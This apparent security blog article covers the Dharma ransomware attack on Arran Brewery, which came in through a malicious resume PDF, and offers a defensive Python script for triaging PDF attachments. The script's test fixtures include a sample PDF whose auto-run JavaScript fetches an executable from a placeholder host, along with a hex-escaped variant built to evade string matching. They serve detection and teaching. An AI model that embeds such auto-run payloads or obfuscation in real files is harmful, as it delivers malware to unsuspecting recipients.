Hey attackers, leave the (beer) alone! Arran Brewery Compromised
Unfortunately, ransomware is a common threat to businesses of every size. Part of the reason is that the delivery method (usually a phishing email with an attachment) is cheap, low effort, and easy to repeat, so even a marginally effective campaign can return a large ROI (return on investment) to the attacker. Any business with capital or data of value is a viable target.
One attack point that attackers have not used as much as they could is the Human Resources department. HR staff expect dozens of resumes and supporting documents every day from people seeking positions with the business. They are trained in HR matters, not in spotting malware, and may open the documents without a second thought. For the business, that can have unintended results.
Arran Brewery is a small brewery based on the Isle of Arran in Scotland; it sells Arran Blonde and Arran Red Squirrel. Through the year the business has multiple job openings and accepts resumes and other documents from applicants.
As noted, the business was the victim of ransomware, which it described as a sophisticated attack. Most ransomware attacks get that label even when the strain is an ordinary one. As is typical with ransomware, the target opened an email carrying a resume as the attachment; in this incident the ransomware was reportedly delivered through the PDF. It was a variant of the Dharma ransomware, which appends the .bip extension to the files it encrypts.
The HR staff member would have had no way of knowing the resume carried ransomware. Among the dozens of documents received, it would have been difficult to pick out the malicious one. The attacker had the job posting republished on several other career sites to increase the number of resumes received. This worked brilliantly to camouflage the malicious email among a flood of legitimate resumes from sources that would not normally send any. The sudden arrival of applications from across the country and around the world should have been noted as a symptom that something was wrong.
The ransomware locked the brewery out of its systems and also encrypted a portion of its backups. The ransom for the decryption key was two bitcoins. Arran Brewery declined to pay. The business lost three months of sales data from one server and set about attempting to restore it. To gain reasonable assurance that the malware was no longer present on the servers, the business contracted a consultant to purge it.
As you would expect, the disruption to the business was significant. This included, but was not limited to, the lost sales data, the direct labor and overhead of the staff working on the issue, and the contractors' fees. Remediation was not cheap. In a non-financial sense, management partially lost confidence in their cybersecurity controls.
When the HR staff member opened the malicious file, the staff member was simply following standard operating procedure: receive the resumes, open them, and review the qualifications. Of the hundreds of resumes received, at least one made it through the malware filter and was opened. This shows the need for the blue (defensive) team to think more creatively about how an attacker will turn the business's own processes against it.
It also highlights the need for additional training, alongside controls that do not depend on one person spotting the one bad file, to reduce the potential for ransomware in the enterprise as much as possible.
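A resume is text and images; it has no reason to carry scripts, auto-run actions, launch actions or embedded files. One check a defender can bolt onto an HR inbox is to triage every inbound PDF for exactly those features before anyone opens it. The script below is an added example written for this article, not the brewery's tooling and not a substitute for a sandbox or antivirus engine; the sample PDFs are constructed inline, and `example.invalid` is a placeholder host. It scans the raw bytes for PDF name objects that signal active content, decodes the `#xx` hex escapes PDF allows inside names (so `/Open#41ction` still matches `/OpenAction`), rejects files whose header says they are not PDFs at all, and separately flags documents that use object streams, where names can hide from a byte-level scan and a real parser is needed.

```python
"""Triage inbound PDF attachments (e.g. CVs sent to an HR inbox) for active
content a resume never needs. Added example, not the brewery's own tooling."""
import re
from dataclasses import dataclass, field

# PDF name objects that a plain text/image CV has no reason to carry.
RISKY_NAMES = {
    b"/JavaScript": "embedded JavaScript",
    b"/JS": "JavaScript action",
    b"/OpenAction": "action that runs when the document is opened",
    b"/AA": "additional (event-triggered) actions",
    b"/Launch": "launch action (can start an external program)",
    b"/EmbeddedFile": "embedded file attachment",
    b"/RichMedia": "rich media (Flash) content",
    b"/XFA": "XFA form (scriptable)",
}

# A PDF name ends at whitespace or a delimiter; this stops /JS matching /JSmith.
_NAME_END = rb"(?![A-Za-z0-9_.\-])"


@dataclass
class Verdict:
    risky: bool                       # quarantine: active content or not a PDF
    findings: list = field(default_factory=list)
    needs_deep_scan: bool = False     # object streams may hide further names


def _decode_name_escapes(data: bytes) -> bytes:
    # PDF allows '#xx' hex escapes inside names (e.g. /J#53 for /JS).
    # Decode them so trivially obfuscated names still match.
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def triage_pdf(data: bytes) -> Verdict:
    """Return a Verdict for one attachment's raw bytes."""
    if not data.startswith(b"%PDF-"):
        # A renamed executable or script with a .pdf name is the classic trick.
        return Verdict(risky=True, findings=["not a PDF (header missing)"])
    text = _decode_name_escapes(data)
    verdict = Verdict(risky=False)
    for name, why in RISKY_NAMES.items():
        if re.search(re.escape(name) + _NAME_END, text):
            verdict.findings.append(f"{name.decode()}: {why}")
    # Object streams (/ObjStm) hold compressed dictionaries that this
    # byte-level scan cannot see; hand those files to a real PDF parser.
    verdict.needs_deep_scan = re.search(rb"/ObjStm" + _NAME_END, text) is not None
    verdict.risky = bool(verdict.findings)
    return verdict


# Constructed sample inputs (minimal, hand-written PDFs; not real CVs).
BENIGN_CV = (
    b"%PDF-1.4\n"
    b"1 0 obj<</Type/Catalog/Pages 2 0 R>>endobj\n"
    b"2 0 obj<</Type/Pages/Kids[3 0 R]/Count 1>>endobj\n"
    b"3 0 obj<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]>>endobj\n"
    b"trailer<</Root 1 0 R>>\n%%EOF\n"
)
MALICIOUS_CV = (
    b"%PDF-1.4\n"
    b"1 0 obj<</Type/Catalog/Pages 2 0 R/OpenAction 4 0 R>>endobj\n"
    b"2 0 obj<</Type/Pages/Kids[3 0 R]/Count 1>>endobj\n"
    b"3 0 obj<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]>>endobj\n"
    b"4 0 obj<</S/JavaScript/JS(app.launchURL('http://example.invalid/cv.exe'))>>endobj\n"
    b"trailer<</Root 1 0 R>>\n%%EOF\n"
)
# Same payload with the key names hex-escaped to dodge a naive string match.
OBFUSCATED_CV = MALICIOUS_CV.replace(b"/OpenAction", b"/Open#41ction") \
                            .replace(b"/JavaScript", b"/Java#53cript") \
                            .replace(b"/JS(", b"/J#53(")


if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_CV), ("malicious", MALICIOUS_CV),
                        ("obfuscated", OBFUSCATED_CV), ("renamed exe", b"MZ\x90\x00")):
        v = triage_pdf(blob)
        print(f"{label:12} risky={v.risky} deep_scan={v.needs_deep_scan} {v.findings}")
```

Anything the script marks `risky` goes to quarantine rather than to the HR inbox; anything marked `needs_deep_scan` goes to a proper PDF parser or a sandbox. The point is that the decision is taken before a human, who is paid to read resumes and not to spot malware, ever sees the file.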
BBC. (2018, September 20). Arran Brewery hit by ransomware attack. Retrieved from https://www.bbc.com/uk-scotland-scotland-business-45587903
Burton, G. (2018, September 21). Arran Brewery attacked with ransomware under cover of recruitment-ad CV spam. Retrieved from https://www.computing.co.uk/ctg/news/3063224/arran-brewery-attacked-with-ransomware-under-cover-of-recruitment-ad-CV-spam
Dissent. (2018, September 21). UK: Arran Brewery blackmailed by hackers as Scottish beer firm becomes latest victim of sophisticated ransomware attack. Retrieved from https://www.databreaches.net/uk-arran-brewery-blackmailed-by-hackers-as-scottish-beer-firm-becomes-latest-victim-of-sophisticated-ransomware-attack/
French, P. (2018, September 21). Arran Brewery victim of 'very devious' cyber attack. Retrieved from https://www.thedrinksbusiness.com/2018/09/arran-brewery-victim-of-very-devious-cyber-attack/
Leyden, J. (2018, September 21). Scottish brewery recovers from ransomware attack. Retrieved from https://www.theregister.co.uk/2018/09/21/arran_brewer_ransomware/
N., B. (2018, September 24). Arran Brewery hit by massive ransomware attack, warns other companies to stay safe. Retrieved from https://gbhackers.com/arran-brewery/
Nexit. (2018, September 21). Scotland's Arran Brewery slammed by Dharma Bip ransomware. Retrieved from https://www.next-it.net/scotlands-arran-brewery-slammed-by-dharma-bip-ransomware/
Olenick, D. (2018, September 21). Scottish brewery ransomware attack leverages job opening. Retrieved from https://www.scmagazine.com/home/news/scottish-brewery-ransomware-attack-leverages-job-opening/
Schwartz, M. J. (2018, September 21). Scotland's Arran Brewery slammed by Dharma Bip ransomware. Retrieved from https://www.bankinfosecurity.com/scottish-brewery-slammed-by-dharma-ransomware-variant-a-11537
Smith. (2018, September 23). Brewery became victim of targeted ransomware attack via job vacancy ad. Retrieved from https://www.csoonline.com/article/3307193/security/brewery-became-victim-of-targeted-ransomware-attack-via-job-vacancy-ad.html
Sussman, B. (2018, September 21). Tear in my beer: Brewery hit by ransomware. Retrieved from https://www.secureworldexpo.com/industry-news/ransomware-hr-case
Whitelaw, J. (2018, September 20). 'Pay up': Arran Brewery blackmailed by hackers as Scottish beer firm becomes latest victim of sophisticated ransomware attack. Retrieved from https://www.thescottishsun.co.uk/tech/3235218/arran-brewery-blackmailed-hackers-ransomware-attack/
About the Author - Charles Parker, II has been working in the info sec field for over a decade, performing pen tests, vulnerability assessments, consulting with small- to medium-sized businesses to mitigate and remediate their issues, and preparing IT and info sec policies and procedures. Mr. Parker’s background includes work in the banking, medical, automotive, and staffing industries.